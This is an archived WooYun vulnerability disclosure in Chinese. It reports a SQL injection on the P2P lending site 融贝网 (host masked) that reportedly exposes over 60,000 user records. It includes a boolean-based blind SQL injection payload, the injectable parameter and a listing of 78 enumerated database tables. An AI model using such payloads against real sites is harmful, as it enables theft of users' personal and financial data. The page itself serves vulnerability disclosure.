当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133849

漏洞标题:P2P金融安全之融贝网存在sql注入漏洞可获取6万用户敏感信息

相关厂商:融贝网

漏洞作者: 路人甲

提交时间:2015-08-17 22:00

修复时间:2015-10-01 22:00

公开时间:2015-10-01 22:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

test

详细说明:

融贝网https://**.**.**.**/主站存在sql注入漏洞通过注入漏洞,可以获取6万多用户信息。

漏洞证明:

注入点:https://**.**.**.**/index/plist?type=0&status=0&income=0&condition=close&payment=0&cycle=0

Parameter: type (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: type=(SELECT (CASE WHEN (5430=5430) THEN 5430 ELSE 5430*(SELECT 5430 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&status=0&income=0&condition=close&payment=0&cycle=0


通过注入跑出了dbs

3.jpg


当前库是vvt

5.jpg


vvt库中有78个表

4.jpg


[78 tables]
+---------------------------+
| vvt_admin_funcs           |
| vvt_admin_role_funcs      |
| vvt_admin_roles           |
| vvt_admin_user            |
| vvt_areas                 |
| vvt_assign                |
| vvt_assign_audit          |
| vvt_bankinfo              |
| vvt_banks                 |
| vvt_banks_branch          |
| vvt_banner                |
| vvt_cautioner             |
| vvt_cautioner_property    |
| vvt_charge                |
| vvt_charge_company        |
| vvt_check_user_account    |
| vvt_checkmobile           |
| vvt_chinapnr_bankinfo     |
| vvt_cms_category          |
| vvt_company               |
| vvt_company_loan          |
| vvt_company_property      |
| vvt_crontab               |
| vvt_csai_push             |
| vvt_discharge             |
| vvt_discharge_company     |
| vvt_flink_partner         |
| vvt_illegalusername       |
| vvt_income                |
| vvt_invest                |
| vvt_invitation            |
| vvt_invite_reward         |
| vvt_log                   |
| vvt_message               |
| vvt_messagesend           |
| vvt_move_statistics       |
| vvt_newcms                |
| vvt_payment               |
| vvt_payment_copy          |
| vvt_personal_approveinfo  |
| vvt_personal_property     |
| vvt_petition              |
| vvt_platform              |
| vvt_project               |
| vvt_project_copy          |
| vvt_project_othergain     |
| vvt_project_pregain       |
| vvt_project_property      |
| vvt_project_schedule      |
| vvt_project_schedule_copy |
| vvt_promote_summary       |
| vvt_property              |
| vvt_question              |
| vvt_repayment             |
| vvt_repayment_copy        |
| vvt_reviewsinfo           |
| vvt_role                  |
| vvt_spread_award          |
| vvt_spread_duanwu         |
| vvt_spread_times          |
| vvt_survey_options        |
| vvt_survey_questions      |
| vvt_sys_company_pay       |
| vvt_sys_profit            |
| vvt_user                  |
| vvt_user_cash             |
| vvt_user_gain             |
| vvt_user_gain_copy        |
| vvt_user_log              |
| vvt_user_money_log        |
| vvt_user_property         |
| vvt_user_property_copy    |
| vvt_user_rebate           |
| vvt_user_repayment        |
| vvt_user_reward           |
| vvt_user_service_log      |
| vvt_user_suggestion       |
| vvt_user_survey_log       |
+---------------------------+


跑了一下vvt_user表,表中有6万多用户数据

1.jpg


跑的速度有点慢,跑了几行验证一下

2.jpg

修复方案:

做好过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:暂时无回应

漏洞Rank:0

确认时间:2015-08-17 22:00

厂商回复:

最新状态:

暂无